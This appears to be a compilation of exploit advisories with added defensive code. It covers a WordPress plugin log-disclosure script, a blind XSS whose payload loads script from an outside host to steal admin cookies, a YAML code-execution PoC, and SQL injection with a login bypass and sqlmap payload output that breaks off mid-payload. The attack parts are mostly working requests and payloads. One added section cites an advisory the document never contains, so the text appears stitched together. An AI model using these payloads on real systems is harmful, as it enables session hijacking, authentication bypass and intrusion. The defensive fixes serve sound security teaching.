# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <= 5.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md


'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
This affects versions up to, and including, 5.1.
'''

import argparse
import requests

'''
Banner:
'''
# Raw string: the ASCII art contains backslashes that would otherwise be read as escape sequences.
banner = r'''
  ______     _______     ____   ___ ____  _      _____ ___ _________ _____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ // _ \___ /___ \___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
 \____|  \_/  |_____|   |_____|\___/_____|_|    |____/  /_/____/_____/_/

                                * Sensitive information disclosure
                                @ Author: Ron Jost
'''
print(banner)

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str, required=True, help='target host or IP')
my_parser.add_argument('-P', '--PORT', type=str, default='80', help='target port (default 80)')
my_parser.add_argument('-U', '--PATH', type=str, default='', help='WordPress install path, e.g. wordpress (leave empty if installed at the web root)')
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH.strip('/')
print('')
print('[*] Starting Exploit:')
print('')

paths = ["/wp-content/bps-backup/logs/db_backup_log.txt",  "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]

# Exploit: request both known log locations; a 200 response carrying the log text confirms the disclosure.
base = "http://" + target_ip + ':' + target_port + ('/' + wp_path if wp_path else '')
for pathadd in paths:
    x = requests.get(base + pathadd)
    print('[*] ' + base + pathadd + ' -> HTTP ' + str(x.status_code))
    print(x.text)
            
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*
1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".

Request:
========

POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999
&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book


Now to confirm the vulnerability:

3) Log in as admin by navigating to http://localhost/odms/admin/login.php.
4) As soon as the admin opens /view-booking-detail.php to approve the booking, the payload fires and the attacker receives the admin's details, such as IP address and cookies.
5) The admin's cookies are captured successfully.

#POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG
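Both the E-Negosyo `PRODESC` stored XSS above and this blind XSS in the booking form come down to stored fields being echoed into HTML unencoded, and both payloads work because the session cookie is readable from script. The added example below (not either application's code, which is PHP, and not part of the advisories) shows the output encoding that renders the stored payloads inert in text and attribute context, a Content-Security-Policy that blocks inline script if an encoding is ever missed, and a session cookie set with `HttpOnly` so that `document.cookie` cannot read it. The records are constructed; the field names mirror the requests above.

```python
import html

# Constructed records carrying the payload shapes from the two advisories above.
PRODUCT = {"OWNERNAME": "Test", "PRODESC": "<script>alert(document.cookie)</script>"}
BOOKING = {"name": '"><script src=https://example.invalid/x.js></script>',
           "vaddress": "12 Main St", "addinfo": "none"}


def esc(value):
    """HTML-encode for text content and for double-quoted attribute values."""
    return html.escape(str(value), quote=True)


def render_product_card(product):
    """Render a product the way the storefront home page would, with encoding applied."""
    return ('<div class="product" data-owner="%s"><p>%s</p></div>'
            % (esc(product["OWNERNAME"]), esc(product["PRODESC"])))


def render_booking_detail(booking):
    """Render the admin's booking-detail table; every stored field is encoded."""
    rows = "".join("<tr><th>%s</th><td>%s</td></tr>" % (esc(k), esc(v))
                   for k, v in booking.items())
    return '<table class="booking">%s</table>' % rows


def security_headers():
    """Response headers that stop inline and third-party scripts even if an encoding is missed."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def session_cookie(session_id):
    """Set-Cookie value for the PHP session: HttpOnly keeps it out of document.cookie."""
    return "PHPSESSID=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % session_id


def contains_active_markup(rendered):
    """Test/monitoring helper: does the rendered HTML still contain a live script element?"""
    lowered = rendered.lower()
    return "<script" in lowered or "javascript:" in lowered


if __name__ == "__main__":
    print(render_product_card(PRODUCT))
    print(render_booking_detail(BOOKING))
    print(security_headers())
    print(session_cookie("constructed-session-id"))
```

Encoding at output time is the fix; the CSP and the `HttpOnly` flag do not remove the bug but limit what a missed encoding can achieve, which for the cookie-theft scenario described above is the difference between a defaced page and a hijacked admin session.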
            
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:
slo-generator is a tool to compute and export Service Level Objectives (SLOs),
Error Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.

##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. Save the YAML below in a file named exploit.yaml:
   !!python/object/apply:os.system ["id;whoami"]
3. Run the command below:
   slo-generator migrate -b exploit.yaml
##############################################################################
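The document above executes because the YAML is loaded with a constructor that honours PyYAML's `!!python/object/apply` tag. The added example below (not slo-generator's code, and not part of the advisory) shows the two layers a consumer of untrusted YAML should have: a pre-parse tag scan that needs only the standard library (usable in CI or when reviewing a config repository), and `yaml.safe_load`, which refuses any `python/` tag. The sample documents are constructed; PyYAML is optional here and only the scan is exercised without it.

```python
import re

try:
    import yaml          # PyYAML; optional for this example
except ImportError:      # the tag scan below works without it
    yaml = None

# Matches PyYAML's language-specific tags, e.g. !!python/object/apply:os.system
PYTHON_TAG_RE = re.compile(r"!!?python/")

# Constructed documents: a copy of the PoC above, and a benign config of assumed shape.
EXPLOIT_YAML = '!!python/object/apply:os.system ["id;whoami"]\n'
BENIGN_YAML = "metadata:\n  name: demo\nspec:\n  goal: 0.99\n"


def contains_python_tag(text):
    """True if the document carries a !!python/ or !python/ tag anywhere."""
    return PYTHON_TAG_RE.search(text) is not None


def load_untrusted_yaml(text):
    """Parse YAML that came from an untrusted source.

    Refuses the document before parsing if a python/ tag is present; otherwise
    uses safe_load, whose constructor only builds scalars, lists and dicts, so
    no tag can map to a Python callable.
    """
    if contains_python_tag(text):
        raise ValueError("refusing YAML with a !!python/ tag")
    if yaml is None:
        raise RuntimeError("PyYAML is not installed")
    return yaml.safe_load(text)


def scan_documents(named_texts):
    """Return the names of documents (for example from a config repo) carrying python/ tags."""
    return [name for name, text in named_texts if contains_python_tag(text)]


if __name__ == "__main__":
    print("flagged:", scan_documents([("exploit.yaml", EXPLOIT_YAML), ("slo.yaml", BENIGN_YAML)]))
    try:
        load_untrusted_yaml(EXPLOIT_YAML)
    except ValueError as exc:
        print("refused:", exc)
```

`safe_load` alone is the correct fix in code; the tag scan is worth keeping as a cheap detection step for configuration files that are stored in version control or received from users, because it reports the offending file without ever handing it to a parser.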
            
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection

# All requests can be sent by both an authenticated and a non-authenticated user

# Example vulnerable pages and parameters:

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  - firstname
  - lastname
  - username
  
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  - date_created
  - ticket_no
  - status
  - offense_id
  - fine
  - code
  - name

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# The login request generates an SQL injection error

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=xxxx'&password=xxxx2'

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}

-----------------------------------------------------------------------------------------------------------------------
# Exploitable request - the username parameter can be any value

POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=admin&password=xxxx')+or+'1'='1'+and+('1

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
Logged in as the admin account

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# SQL injection detection, using the pages with the id parameter as the example

# Request generating an SQL error - append ' to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response - SQL error from the database

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]

# Request - add '' after the id parameter value

GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response did not return an error - SQL injection confirmed

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="container-fluid">
    <div class="w-100 d-flex justify-content-end mb-2">
        <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
        <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
    </div>
[...]
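Why the ' / '' pair above separates a vulnerable page from a safe one, as an added example that is not part of the original write-up: an in-memory SQLite database stands in for the MariaDB backend, the two table names come from the leaked query, and the columns and rows are constructed. The concatenated query reproduces the pattern the error message reveals; the parameterized version is the fix. Both are probed with the same three values.

```python
import sqlite3

# Added example (not part of the original write-up). An in-memory SQLite
# database stands in for the MariaDB backend; the two table names come from
# the leaked query above, the columns and rows are constructed for the demo.
SCHEMA = """
CREATE TABLE drivers_list (id INTEGER PRIMARY KEY, license_id_no TEXT, name TEXT);
CREATE TABLE offense_list (id INTEGER PRIMARY KEY, driver_id INTEGER, ticket_no TEXT);
INSERT INTO drivers_list VALUES (1, 'LIC-0001', 'Sample Driver');
INSERT INTO offense_list VALUES (3, 1, '12345678');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, offense_id):
    """Same shape as the leaked query: the id is pasted into the SQL text,
    so a quote in the value changes how the statement parses."""
    sql = ("SELECT r.*, d.license_id_no, d.name AS driver FROM offense_list r "
           "INNER JOIN drivers_list d ON r.driver_id = d.id "
           "WHERE r.id = '" + offense_id + "'")
    return con.execute(sql).fetchall()


def safe_lookup(con, offense_id):
    """Parameterized form: the id is bound as data and never parsed as SQL."""
    sql = ("SELECT r.*, d.license_id_no, d.name AS driver FROM offense_list r "
           "INNER JOIN drivers_list d ON r.driver_id = d.id "
           "WHERE r.id = ?")
    return con.execute(sql, (offense_id,)).fetchall()


def probe(lookup, offense_id):
    """What a tester observes for one value: rows, an empty result, or an SQL error."""
    con = make_db()
    try:
        rows = lookup(con, offense_id)
    except sqlite3.OperationalError:
        return "sql_error"
    finally:
        con.close()
    return "rows" if rows else "empty"


def quote_differential(lookup, base_id="3"):
    """The ' / '' test from Example 2. With string concatenation a single
    quote leaves the literal unterminated (syntax error), while a doubled
    quote is read as an escaped quote inside the literal, so the statement
    parses again. With binding, both are just characters in the id value."""
    return {
        "plain": probe(lookup, base_id),
        "single_quote": probe(lookup, base_id + "'"),
        "double_quote": probe(lookup, base_id + "''"),
    }


if __name__ == "__main__":
    print("concatenated:", quote_differential(vulnerable_lookup))
    print("parameterized:", quote_differential(safe_lookup))
```

The concatenated lookup reports an SQL error only for the single quote, which is the differential the write-up relies on; the parameterized lookup never errors, it simply finds no row for a malformed id. Suppressing the error text (display_errors off) hides the signal but not the flaw; only binding removes it.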

-----------------------------------------------------------------------------------------------------------------------

## Example 3

# Using sqlmap on an intercepted request to http://localhost/traffic_offense/classes/Master.php

POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty

-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

# Using the sqlmap utility

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:52:47 /2021-10-07/

[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]

Multipart-like data found in POST body. Do you want to process it? [Y/n/q]

[05:52:51] [INFO] testing connection to the target URL
[...]
---
Parameter: MULTIPART #4* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #5* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND 4015=4015 AND 'mPLR'='mPLR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #6* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
